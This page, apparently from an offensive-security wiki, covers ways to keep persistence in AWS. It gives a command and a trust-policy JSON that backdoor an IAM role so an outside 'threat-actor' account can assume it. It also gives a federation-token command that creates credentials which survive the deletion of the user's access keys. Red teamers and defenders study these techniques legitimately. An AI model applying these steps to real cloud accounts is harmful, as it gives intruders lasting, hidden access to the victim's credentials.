Maintaining Persistence

Tips and tricks for maintaining persistence in AWS

Creating an Access Key for an IAM User

Backdoor an IAM Role

IAM Roles have Trust Policies which dictate who or what (user/role/service) can assume the Role and gain access to its credentials and permissions. With this permission, a threat actor can modify the role's trust policy and gain access to it.

aws iam update-assume-role-policy --role-name Engineering --policy-document file://attacker-trust-policy.json

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": [
                    "arn:aws:iam::111111111111:user/legitimate-user",
                    "arn:aws:iam::222222222222:user/threat-actor"
                ]
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Generating Temporary AWS Credentials from CloudShell

See details here Generate IAM Access Keys from CloudShell

Generating Temporary AWS Credentials from IAM User

The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User. This does not work with IAM Roles.

You can specify any name you want — it doesn't need to be a real user
You can specify any policy you want (up to 10 managed and/or inline policies)
Ultimately, you only have the permissions the user running this command has even if you pass the administrator policy as a command argument
If the user that generated these credentials has their permissions altered (gain/lose) this affects the active session credentials
These credentials still work even if the the IAM User's access keys have been deactivated and/or deleted

aws sts get-federation-token --name sally --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess --duration-seconds 129,600

PreviousSubdomain Takeovers NextPrivilege Escalation

Last updated 3 days ago

Was this helpful?